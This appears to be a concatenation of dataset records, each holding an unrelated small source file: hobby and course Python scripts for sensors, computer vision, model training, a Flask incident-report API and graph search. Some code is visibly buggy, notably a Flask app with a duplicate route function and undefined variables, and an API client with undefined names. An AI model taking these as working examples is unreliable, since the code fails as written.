Args:\n beverages (dict): beverages with their required ingredients and quantity\n \"\"\"\n servings = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=self.outlets) as executor:\n for item, ingredients in beverages.items():\n beverage = Beverage(item, ingredients)\n servings.append(executor.submit(beverage.brew))\n for serving in concurrent.futures.as_completed(servings):\n print(serving.result())\n","sub_path":"coffee_machine/coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"166688089","text":"from pybricks.pupdevices import ColorDistanceSensor\nfrom pybricks.parameters import Port, Color\nfrom pybricks.tools import wait\n\n# Initialize the sensor.\nsensor = 
ColorDistanceSensor(Port.A)\n\n\n# This is a function that waits for a desired color.\ndef wait_for_color(desired_color):\n # While the color is not the desired color, we keep waiting.\n while sensor.color() != desired_color:\n wait(20)\n\n\n# Now we use the function we just created above.\nwhile True:\n\n # Here you can make your train/vehicle go forward.\n\n print(\"Waiting for red ...\")\n wait_for_color(Color.RED)\n\n # Here you can make your train/vehicle go backward.\n\n print(\"Waiting for blue ...\")\n wait_for_color(Color.BLUE)\n","sub_path":"snippets/pup/sensor_color_distance/wait_for_color.py","file_name":"wait_for_color.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"486864917","text":"# test_stickneopixel.py - test LED-stick\n# 2017_0122 PePo new\n# Source:\n# Tony Dicola source: https://gist.github.com/tdicola/6fe1fbc173dcd49de3a95be5fd9594f6\n\nimport machine\nimport math\nimport neopixel\nimport time\n\n# 2017_0122 LED stick: GPIO15 / D8, 1 * 8 pixels\nPIXEL_WIDTH = 8\nPIXEL_HEIGHT = 1\nMAX_BRIGHT = 50 # 0 .. 255\n\nnp = neopixel.NeoPixel(machine.Pin(15), PIXEL_WIDTH*PIXEL_HEIGHT)\n\n# Clear all the pixels and turn them off.\nnp.fill((0,0,0))\nnp.write()\n\nwhile True:\n # RED\n np.fill((MAX_BRIGHT, 0, 0))\n np.write()\n time.sleep(1.0)\n\n # GREEN\n np.fill((0, MAX_BRIGHT, 0))\n np.write()\n time.sleep(1.0)\n\n # BLUE\n np.fill((0, 0, MAX_BRIGHT))\n np.write()\n time.sleep(1.0)\n\n # PINK\n np.fill((MAX_BRIGHT, 0, MAX_BRIGHT))\n np.write()\n time.sleep(1.0)\n\n # WHITE\n np.fill((MAX_BRIGHT, MAX_BRIGHT, MAX_BRIGHT))\n np.write()\n time.sleep(1.0)\n\n # blank pixels\n np.fill((0, 0, 0))\n np.write()\n time.sleep(1.0)\n","sub_path":"display-stuff/neopixels/neopixelplasma/test_stickneopixel.py","file_name":"test_stickneopixel.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"471155861","text":"# Program that recognises whether Gender is Male or Female; \r\n# Recognises age in 8 brackets: (0 – 2), (4 – 6), (8 – 12), (15 – 20), (25 – 32), (38 – 43), (48 – 53), (60 – 100)\r\n# Uses a CNN (convolutional neural network) trained to detect and classify images\r\n#The program uses a dataset of 26,580 pictures; each picture has been labelled male/female and with 1 of the 8 age groups.\r\n\r\n#opencv_face_detector.pbtxt and opencv_face_detector_uint8.pb: text-format and binary-format files, the 2 TensorFlow files\r\n#these 2 files are used to run the trained model that detects human faces in an image; they store the graph definition and the trained weights\r\n#age_deploy.prototxt and gender_deploy.prototxt: the model architectures for the Age and Gender detection models \r\n#They are plain-text files with a JSON-like structure that contain all the neural-network layer definitions\r\n\r\n#age_net.caffemodel and gender_net.caffemodel: store the trained model weights for detecting Age and Gender \r\n\r\nimport cv2\r\nimport math\r\nimport argparse\r\n\r\n\r\n#Function that detects the coordinates of human faces in a picture\r\ndef highlightFace(net, frame, conf_threshold=0.7):\r\n frameOpencvDnn=frame.copy()\r\n frameHeight=frameOpencvDnn.shape[0]\r\n frameWidth=frameOpencvDnn.shape[1]\r\n \r\n #Build a blob and pass it through the CNN to detect faces\r\n blob=cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\r\n net.setInput(blob)\r\n detections=net.forward()\r\n faceBoxes=[]\r\n \r\n #Loop to extract the face coordinates\r\n for i in range(detections.shape[2]):\r\n confidence=detections[0,0,i,2]\r\n if confidence>conf_threshold:\r\n x1=int(detections[0,0,i,3]*frameWidth)\r\n y1=int(detections[0,0,i,4]*frameHeight)\r\n x2=int(detections[0,0,i,5]*frameWidth)\r\n y2=int(detections[0,0,i,6]*frameHeight)\r\n faceBoxes.append([x1,y1,x2,y2])\r\n cv2.rectangle(frameOpencvDnn, (x1,y1), (x2,y2), (0,255,0), int(round(frameHeight/150)), 8)\r\n return frameOpencvDnn,faceBoxes\r\n\r\n\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument('--image')\r\n\r\nargs=parser.parse_args()\r\n\r\n# Define the weight and architecture variables for the face, age and gender detection models\r\nfaceProto=\"opencv_face_detector.pbtxt\"\r\nfaceModel=\"opencv_face_detector_uint8.pb\"\r\nageProto=\"age_deploy.prototxt\"\r\nageModel=\"age_net.caffemodel\"\r\ngenderProto=\"gender_deploy.prototxt\"\r\ngenderModel=\"gender_net.caffemodel\"\r\n\r\n#Initialise the model mean values and the Age and Gender class lists \r\nMODEL_MEAN_VALUES=(78.4263377603, 87.7689143744, 114.895847746)\r\nageList=['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']\r\ngenderList=['Male','Female']\r\n\r\n#Load the face, age and gender detection models declared above\r\nfaceNet=cv2.dnn.readNet(faceModel,faceProto)\r\nageNet=cv2.dnn.readNet(ageModel,ageProto)\r\ngenderNet=cv2.dnn.readNet(genderModel,genderProto)\r\n\r\n# Activate the camera if no image to recognise was provided\r\nvideo=cv2.VideoCapture(args.image if args.image else 0)\r\npadding=20\r\n\r\n\r\nwhile cv2.waitKey(1)<0:\r\n hasFrame,frame=video.read()\r\n if not hasFrame:\r\n cv2.waitKey()\r\n break\r\n\r\n resultImg,faceBoxes=highlightFace(faceNet,frame)\r\n if not faceBoxes:\r\n print(\"No face detected\")\r\n\r\n for faceBox in faceBoxes:\r\n face=frame[max(0,faceBox[1]-padding):\r\n min(faceBox[3]+padding,frame.shape[0]-1),max(0,faceBox[0]-padding)\r\n :min(faceBox[2]+padding, frame.shape[1]-1)]\r\n \r\n # Create 4-dimensional blobs and pass them through to recognise Gender and Age\r\n blob=cv2.dnn.blobFromImage(face, 1.0, (227,227), MODEL_MEAN_VALUES, swapRB=False)\r\n genderNet.setInput(blob)\r\n genderPreds=genderNet.forward()\r\n gender=genderList[genderPreds[0].argmax()]\r\n print(f'Gender: {gender}')\r\n\r\n ageNet.setInput(blob)\r\n agePreds=ageNet.forward()\r\n age=ageList[agePreds[0].argmax()]\r\n print(f'Age: {age[1:-1]} years')\r\n\r\n cv2.putText(resultImg, f'{gender}, {age}', (faceBox[0], faceBox[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2, cv2.LINE_AA)\r\n cv2.imshow(\"Detecting age and gender\", resultImg)\r\n","sub_path":"agepic.py","file_name":"agepic.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"130568082","text":"# coding: utf-8\nimport re\nfrom csv import DictReader, DictWriter\n\n\nphone_re = re.compile(r'[\\d\\(\\)\\-]*')\n\ndef clear_phone(phone_text):\n replace_map = {\n '（': '(',\n '）': ')',\n '—': '-',\n '－': '-',\n '？': '',\n '?': '',\n }\n for k,v in replace_map.items():\n phone_text = phone_text.replace(k, v)\n phone = ''.join(phone_re.findall(phone_text))\n return phone\n\nreader = open('lawtime.csv')\nwriter = open('lawtime.new.csv', 'w')\n\nfor line in reader.readlines():\n phone = clear_phone(line)\n writer.write(phone + '\\n')\nreader.close()\nwriter.close()\n#\n# 
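The commented-out calls below are Python 2-style usage examples: clear_phone keeps only digits, parentheses and dashes, e.g. '012订单(8388399)' -> '012(8388399)'.\n# 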
print clear_phone('012-8388399')\n# print clear_phone('(012)-8388399')\n# print clear_phone('(012)-8388399')\n# print clear_phone('012订单(8388399)')\n# print clear_phone('012-8388399add大家的积极')","sub_path":"test_re_replace.py","file_name":"test_re_replace.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"363327309","text":"from dataset import PlantDiseaseDataset, SetType, CLASS_MAP\nimport sys\nimport torch.nn as nn\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nfrom cnn import PlantDiseaseNet\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\n\nclass PlantDiseaseTrainer:\n def __init__(self, model_name: str, epochs: int):\n self.output_filename = model_name + \".pth\"\n self.epochs = epochs\n self.train_set = PlantDiseaseDataset(SetType.train, shuffle=True)\n self.train_loader = DataLoader(\n self.train_set, batch_size=128, shuffle=True, num_workers=12\n )\n\n self.test_set = PlantDiseaseDataset(SetType.test)\n self.test_loader = DataLoader(\n self.test_set, batch_size=128, shuffle=False, num_workers=1\n )\n\n self.val_set = PlantDiseaseDataset(SetType.val, shuffle=True)\n self.val_loader = DataLoader(\n self.val_set, batch_size=64, shuffle=False, num_workers=12\n )\n\n self.config = {\n \"starting_lr\": 1e-3,\n \"momentum\": 0.9,\n \"decay\": 5e-4,\n \"patience\": 15,\n \"lr_factor\": 0.3,\n \"print_cadence\": 100,\n }\n\n self.device = torch.device(\"cuda:0\")\n self.net = PlantDiseaseNet().to(self.device)\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = optim.Adam(\n self.net.parameters(),\n lr=self.config[\"starting_lr\"],\n weight_decay=self.config[\"decay\"],\n )\n self.scheduler = ReduceLROnPlateau(\n self.optimizer,\n factor=self.config[\"lr_factor\"],\n mode=\"max\",\n verbose=True,\n patience=self.config[\"patience\"],\n )\n\n self.writer = SummaryWriter(f\"{model_name}_logs\")\n\n for ds in [self.train_set, self.test_set, self.val_set]:\n print(f\"Size of datasets: {len(ds)}\")\n print(\"Trainer Initialized.\")\n\n def train(self):\n log_iter = 0\n for epoch in range(self.epochs):\n running_loss = 0.0\n for i, (inputs, labels, meta) in enumerate(self.train_loader):\n self.net.train()\n self.optimizer.zero_grad()\n outputs = self.net(inputs.float().to(self.device))\n loss = self.criterion(outputs, labels.long().to(self.device))\n loss.backward()\n self.optimizer.step()\n running_loss += loss.item()\n if i > 0 and i % self.config[\"print_cadence\"] == 0:\n mean_loss = running_loss / self.config[\"print_cadence\"]\n self.writer.add_scalar(\"Train/MRLoss\", mean_loss, log_iter)\n print(f\"Epoch: {epoch}\\tBatch: {i}\\tLoss: {mean_loss}\")\n running_loss = 0.0\n log_iter += 1\n\n train_acc = self.log_metrics(epoch, \"Train\")\n self.log_metrics(epoch, \"Validation\")\n self.scheduler.step(train_acc)\n acc = self.calculate_accuracy(self.test_loader)\n self.writer.add_text(\"Test/Accuracy\", f\"{acc}\")\n\n def log_metrics(self, epoch, label):\n loader = self.val_loader if label == \"Validation\" else self.train_loader\n acc = self.calculate_accuracy(loader)\n self.writer.add_scalar(f\"{label}/Accuracy\", acc, epoch)\n return acc\n\n def calculate_accuracy(self, loader: DataLoader):\n with torch.no_grad():\n self.net.eval()\n correct = 0.0\n total = 0.0\n for inputs, labels, metadata in loader:\n outputs = self.net(inputs.float().to(self.device))\n _, preds = 
outputs.detach().cpu().max(1)\n total += labels.size(0)\n correct += preds.eq(labels.float()).sum().item()\n print(f\"Correct:\\t{correct}, Incorrect:\\t{total-correct}\")\n return correct / total\n\n\nif __name__ == \"__main__\":\n trainer = PlantDiseaseTrainer(sys.argv[1], 425)\n trainer.train()\n torch.save(trainer.net.state_dict(), trainer.output_filename)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"450951711","text":"x = int(input())\nif x == 2: \n print(2)\n exit()\nwhile True:\n for i in range(2, int(-(-x**0.5//1))+1):\n if x%i == 0:\n break\n else:\n print(x)\n break\n x+=1","sub_path":"2_kakomon/abc126-211/abc149_c.py","file_name":"abc149_c.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"221819470","text":"# coding:utf-8\nimport sys\nimport json\n\nfrom PyQt5.QtWidgets import QApplication\nfrom View.album_interface.album_info_bar import AlbumInfoBar\nfrom View.playlist_interface.playlist_info_bar import PlaylistInfoBar\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n with open(\"Playlists/aiko.json\", encoding=\"utf-8\") as f:\n playlist = json.load(f)\n # w = PlaylistInfoBar(playlist)\n\n with open(\"data/songInfo.json\", encoding=\"utf-8\") as f:\n songInfo_list = json.load(f)[:20]\n albumInfo = {\n \"singer\": \"鎖那\",\n \"genre\": \"POP流行\",\n \"year\": \"2016年\",\n \"album\": \"Hush a by little girl\",\n \"coverPath\": \"Album_Cover/鎖那_Hush a by little girl/鎖那_Hush a by little girl.jpg\",\n \"songInfo_list\": songInfo_list\n }\n w = AlbumInfoBar(albumInfo)\n w.show()\n sys.exit(app.exec_())\n","sub_path":"tests/test_collapsing_app_bar.py","file_name":"test_collapsing_app_bar.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"350789976","text":"#!/usr/bin/enb python3\r\n\r\nimport os\r\nimport sys\r\nimport traceback\r\nimport shutil\r\nimport requests\r\n\r\nin_dir = os.path.join(os.path.dirname(sys.executable), \"ca-bundle.crt\")\r\npip_dir = os.path.join(os.getenv(\"Appdata\"), \"pip\")\r\n\r\nif not os.path.isdir(pip_dir):\r\n os.mkdir(pip_dir)\r\n\r\npath = os.path.join(pip_dir, \"ca-bundle.crt\")\r\n\r\ntry:\r\n print(\"patch: downloading mozilla CA certificates...\")\r\n answer = requests.get(\"https://curl.haxx.se/ca/cacert.pem\", stream=True)\r\n print(\"patch: installing downloaded certificates\")\r\n \r\n with open(path, \"wb\") as file:\r\n for chunk in answer.iter_content(chunk_size=1024):\r\n if chunk:\r\n file.write(chunk)\r\n os.system(\"pip.exe config set global.cert {0}\".format(path))\r\nexcept requests.exceptions.ConnectionError:\r\n print(\"patch: certificates loading failed\")\r\n print(\"patch: installing cached certificates\")\r\n shutil.move(in_dir, path)\r\n os.system(\"pip.exe config set global.cert {0}\".format(path))\r\nexcept Exception:\r\n traceback.print_exc()","sub_path":"src/console/patch/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"593656857","text":"from flask import Flask, jsonify, abort, make_response, request\nNOT_FOUND = 'Not found'\nBAD_REQUEST = 'Bad request'\napp = Flask(__name__)\nusers = [\n {\n \"id\":1,\n \"firstname\":\"STEPHEN\",\n 
\"lastname\":\"MWANIKA\",\n \"othernames\":\"CRISPIN\",\n \"email\":\"stephenmwanika@gmail.com\",\n \"phoneNumber\":\"+256774607130\",\n \"username\":\"stephenmwanika\",\n \"registered\":\"YES\",\n \"isAdmin\":\"YES\",\n },\n {\n \"id\":2,\n \"firstname\":\"JUSTINE\",\n \"lastname\":\"AKOTH\",\n \"othernames\":\"PROSCOVIA\",\n \"email\":\"\",\n \"phoneNumber\":\"\",\n \"username\":\"ajustine\",\n \"registered\":\"YES\",\n \"isAdmin\":\"NO\",\n },\n]\n\nredflags = [\n {\n \"id\": 1,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"ATHIENO\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 2,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"NYAMIEL\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 3,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"MWANIKA\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 4,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"AKOTH\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 5,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"OLWENY\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 6,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"ACHIENG\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 7,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"ALOWO\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 8,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"NYAPENDI\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n]\n\ndef _get_redflag(id):\n return [redflag for redflag in redflags if redflag['id'] == id]\n\ndef _record_exists(createdBy):\n return [redflag for redflag in redflags if redflag[\"createdBy\"] == createdBy]\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': NOT_FOUND}), 404)\n\n@app.errorhandler(400)\ndef bad_request(error):\n return make_response(jsonify({'error': BAD_REQUEST}), 400)\n\n@app.route('/api/v1/redflags', methods=['GET'])\ndef get_redflags():\n return jsonify({'redflags': redflags})\n\n@app.route('/api/v1/redflags/', methods=['GET'])\ndef get_redflag(id):\n redflag = _get_redflag(id)\n if not redflag:\n abort(404)\n return jsonify({'redflags': redflag})\n\n@app.route('/api/v1/redflags', methods=['POST'])\ndef create_redflag():\n if not request.json or 'createdBy' not in request.json:\n abort(400)\n redflag_id = redflags[-1].get(\"id\") + 1\n createdBy = request.json.get('createdBy')\n if _record_exists(createdBy):\n abort(400)\n \n redflag = {\n \"id\": redflag_id, \"createdOn\": createdOn, \"createdBy\": createdBy,\n \"Type\": Type, \"location\": location, \"status\": status,\n \"Images\":Images, \"videos\": videos, \"comment\": comment\n }\n redflags.append(redflag)\n return jsonify({'redflag': redflag}), 
201\n\n@app.route('/api/v1/redflags//location', methods=['PATCH'])\ndef edit_redflag(id):\n redflag = _get_redflag(id)\n if len(redflag) == 0:\n abort(404)\n if not request.json:\n abort(400)\n createdOn = request.json.get('createdOn', redflag[0]['createdOn'])\n createdBy = request.json.get('createdBy', redflag[0]['createdBy'])\n Type = request.json.get('Type', redflag[0]['Type'])\n location = request.json.get('location', redflag[0]['location'])\n status = request.json.get('status', redflag[0]['status'])\n Images = request.json.get('Images', redflag[0]['Images'])\n Videos = request.json.get('Videos', redflag[0]['Videos'])\n comment = request.json.get('comment', redflag[0]['comment'])\n \n redflag[0]['createdOn'] = createdOn\n redflag[0]['createdBy'] = createdBy\n redflag[0]['Type'] = Type\n redflag[0]['location'] = location\n redflag[0]['status'] = status\n redflag[0]['Images'] = Images\n redflag[0]['Videos'] = Videos\n redflag[0]['comment'] = comment\n return jsonify({'redflag': redflag[0]}), 200\n\n@app.route('/api/v1/redflags//comment', methods=['PATCH'])\ndef edit_redflag(id):\n redflag = _get_redflag(id)\n if len(redflag) == 0:\n abort(404)\n if not request.json:\n abort(400)\n createdOn = request.json.get('createdOn', redflag[0]['createdOn'])\n createdBy = request.json.get('createdBy', redflag[0]['createdBy'])\n Type = request.json.get('Type', redflag[0]['Type'])\n location = request.json.get('location', redflag[0]['location'])\n status = request.json.get('status', redflag[0]['status'])\n Images = request.json.get('Images', redflag[0]['Images'])\n Videos = request.json.get('Videos', redflag[0]['Videos'])\n comment = request.json.get('comment', redflag[0]['comment'])\n \n redflag[0]['createdOn'] = createdOn\n redflag[0]['createdBy'] = createdBy\n redflag[0]['Type'] = Type\n redflag[0]['location'] = location\n redflag[0]['status'] = status\n redflag[0]['Images'] = Images\n redflag[0]['Videos'] = Videos\n redflag[0]['comment'] = comment\n return jsonify({'redflag': redflag[0]}), 200\n \n@app.route('/api/v1/redflags/', methods=['DELETE'])\ndef delete_redflag(id):\n redflag = _get_redflag(id)\n if len(redflag) == 0:\n abort(404)\n redflags.remove(redflag[0])\n return jsonify({}), 204\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"542857501","text":"import f_eqa2utm\nimport pandas as pd\n\n# read csv\ndataFolder = \"C:/Users/niedo/OneDrive/SL/2022/202206MongoliaSurvey/PreliminaryStudy/GPX\"\ndata_csv = pd.read_csv(dataFolder + \"/Grid240_ponits_coordinate.csv\")\n\n# make blank data frame for the result\ncols = ['x', 'y']\nresult_df = pd.DataFrame(index=[], columns=cols)\n\nfor row in data_csv.itertuples():\n # print(row.y)\n utm_result = f_eqa2utm.eqa2Utm(lon=row.y, lat=row.x, zone = False) \n \n utm_record = pd.DataFrame({'x': utm_result[1], 'y': utm_result[0]}, index = ['1'])\n # print(utm_record)\n result_df = pd.concat([result_df, utm_record], ignore_index=True)\n\n# print(data_csv)\n# utm_result = utm2eqa.utm2Epa(lon=105.93856674505157, lat=46.88053214466702) #[deg.]\n# print(result_df)\nresult_df.to_csv(dataFolder + '/Grid240_ponits_coordinateUTM.csv',index=False)","sub_path":"Coord_UTM/e_someeqa2utm.py","file_name":"e_someeqa2utm.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} 
+{"seq_id":"374260858","text":"import sys\nimport asyncio\nimport aiohttp\nimport nest_asyncio\n\nimport pandas as pd\nimport numpy as np\n\nfrom femtonet.api.cubedata import CubeData\n\nclass FemtoNetAPI:\n def __init__(self):\n self.api_base_url = 'http://femtography.uvadcos.io/api/'\n self.cube_data = CubeData()\n\n def _api_async(func):\n \"\"\" Decorator used to generate an asynchronous request\n\n Args:\n func (async function): An asynchronous API request function.\n\n Returns:\n CubeData: A custom data class containing a list of columns and a Pandas DataFrame with the requested GPD information.\n \n \"\"\"\n def request_wrapper(self, *args, **kwargs):\n if 'ipykernel' in sys.modules:\n try:\n loop = asyncio.get_running_loop()\n except RuntimeError:\n loop = asyncio.new_event_loop()\n loop.run_until_complete(self._to_task(func(self, *args, **kwargs), True, loop))\n else:\n nest_asyncio.apply(loop)\n return asyncio.run(self._to_task(func(self, *args, **kwargs), True, loop))\n\n else:\n return asyncio.run(func(self, *args, **kwargs))\n \n return request_wrapper\n\n @_api_async\n async def data_query(self, model:str, gpd:str, xbj:float, t:float, qs:float):\n async with aiohttp.ClientSession() as session:\n url = self.api_base_url = 'http://femtography.uvadcos.io/api/{model}/{gpd}/{xbj}/{t}/{qs}'.format(model=model, gpd=gpd.upper(), xbj=xbj, t=t, qs=qs)\n \n async with session.get(url) as resp:\n print(''.format(model=model, gpd=gpd.upper(), xbj=_xbj, t=_t, qs=qs))\n response = await resp.json(content_type='text/html')\n return self._set_data_cube(response)\n\n\n def _to_task(self, future, as_task, loop):\n return loop.create_task(future)\n\n def _set_data_cube(self, response):\n self.cube_data.data = pd.DataFrame.from_dict(response)\n self.cube_data.columns = self.cube_data.data.columns\n\n return self.cube_data\n\n def _find_nearest_value(self, data:np.array, value:float)->int:\n index = np.abs(data - value).argmin()\n return data[index]\n \n \n","sub_path":"femtonet/api/femtoapi.py","file_name":"femtoapi.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"284609262","text":"import matplotlib.pyplot as plt \nimport numpy as np \nfrom matplotlib import style\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import axes3d\n\nkota=[] ; th2015=[] ; th2016=[]\nplt.figure('3D Plotting',figsize=(10,5))\ncustom=plt.subplot(111,projection='3d')\ndef print3D():\n data=open(\"rokok.csv\").read()\n baris=data.split('\\n')\n for isidata in baris:\n x,y,z=isidata.split(',')\n kota.append(x)\n th2015.append(float(y))\n th2016.append(float(z))\n kota.remove(kota[0]);th2015.remove(th2015[0]);th2016.remove(th2016[0])\n xalas = np.arange(0,len(kota))\n yalas = np.repeat(0.5,len(kota))\n zalas = np.zeros(len(kota))\n xdinding = np.ones(len(kota))\n ydinding = np.ones(len(kota))\n zdinding = np.array(th2015)\n custom.bar3d(xalas,yalas,zalas,xdinding,ydinding,zdinding,color=['r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c']) #bisa beri color tiap bar, color=[]\n # custom.set_xlabel('Nilai X')\n plt.xticks(xalas,kota,rotation=90)\n custom.set_ylabel('Nilai Y')\n custom.set_ylim(0,10)\n custom.set_zlabel('Nilai Z')\n plt.show()\n\nprint3D()","sub_path":"belajar 
numpy/3adji.py","file_name":"3adji.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"257757712","text":"import numpy as np\nimport torch\nfrom .masks import build_mask\n\n\nclass MCDUE:\n \"\"\"\n Estimate uncertainty for samples with MCDUE approach\n \"\"\"\n def __init__(self, net, nn_runs=25, dropout_rate=.5):\n self.net = net\n self.nn_runs = nn_runs\n self.dropout_rate = dropout_rate\n\n def estimate(self, X_pool, *args):\n mcd_realizations = np.zeros((X_pool.shape[0], self.nn_runs))\n\n with torch.no_grad():\n for nn_run in range(self.nn_runs):\n prediction = self.net(X_pool, dropout_rate=self.dropout_rate)\n mcd_realizations[:, nn_run] = np.ravel(prediction.to('cpu'))\n\n return np.ravel(np.std(mcd_realizations, axis=1))\n\n\nclass MCDUEMasked:\n \"\"\"\n Estimate uncertainty for samples with MCDUE approach\n \"\"\"\n def __init__(self, net, nn_runs=25, dropout_rate=.5, dropout_mask=None, keep_runs=False):\n self.net = net\n self.nn_runs = nn_runs\n self.dropout_rate = dropout_rate\n if isinstance(dropout_mask, str):\n dropout_mask = build_mask(dropout_mask)\n self.dropout_mask = dropout_mask\n self.keep_runs = keep_runs\n self._mcd_runs = np.array([])\n\n def estimate(self, X_pool, *args):\n mcd_runs = np.zeros((X_pool.shape[0], self.nn_runs))\n\n with torch.no_grad():\n # Some mask needs first run without dropout, i.e. decorrelation mask\n if hasattr(self.dropout_mask, 'dry_run') and self.dropout_mask.dry_run:\n self.net(X_pool, dropout_rate=self.dropout_rate, dropout_mask=self.dropout_mask)\n\n # Get mcdue estimation\n for nn_run in range(self.nn_runs):\n prediction = self.net(\n X_pool, dropout_rate=self.dropout_rate, dropout_mask=self.dropout_mask\n ).to('cpu')\n mcd_runs[:, nn_run] = np.ravel(prediction)\n\n if self.keep_runs:\n self._mcd_runs = mcd_runs\n\n return np.ravel(np.std(mcd_runs, axis=1))\n\n def reset(self):\n if hasattr(self.dropout_mask, 'reset'):\n self.dropout_mask.reset()\n\n def last_mcd_runs(self):\n \"\"\"Return model prediction for last uncertainty estimation\"\"\"\n if not self.keep_runs:\n print(\"mcd_runs: You should set `keep_runs=True` to properly use this method\")\n return self._mcd_runs\n\n\n\n\n\n","sub_path":"2020/alpaca-master stat-mlalpaca/alpaca/uncertainty_estimator/mcdue.py","file_name":"mcdue.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"100087257","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 4 21:15:10 2018\r\n\r\n@author: shash\r\n\"\"\"\r\n\r\nd={}\r\nt={}\r\nd[1]=[False,4,10]\r\nd[2]=[False,8]\r\nd[3]=[False,6]\r\nd[4]=[False,7]\r\nd[5]=[False,2]\r\nd[6]=[False,9]\r\nd[7]=[False,1]\r\nd[8]=[False,5,6]\r\nd[9]=[False,3,7]\r\nd[10]=[False,4,11]\r\nd[11]=[False,12]\r\nd[12]=[False,10]\r\ntime=0\r\ntimelash=[0]*13\r\ndef DFS(graph,vertex):\r\n global time\r\n (graph[vertex])[0]=True\r\n try:\r\n neighbours=(graph[vertex])[1:]\r\n except:\r\n neighbours=[]\r\n for neighbour in neighbours:\r\n if (graph[neighbour])[0]==False:\r\n try:\r\n DFS(graph,neighbour)\r\n except:\r\n print(\"JINGALLALAH\")\r\n time+=1\r\n timelash[vertex]=time\r\n if neighbours==[] :\r\n return\r\n\r\nDFS(d,2)\r\ni=1\r\norder=[]\r\nfor key in d:\r\n print(\"Timelash for {} is {} \".format(key,timelash[i]))\r\n order.append((timelash[i],key))\r\n i+=1 
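# i tracks the vertex id while collecting (finish_time, vertex) pairs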
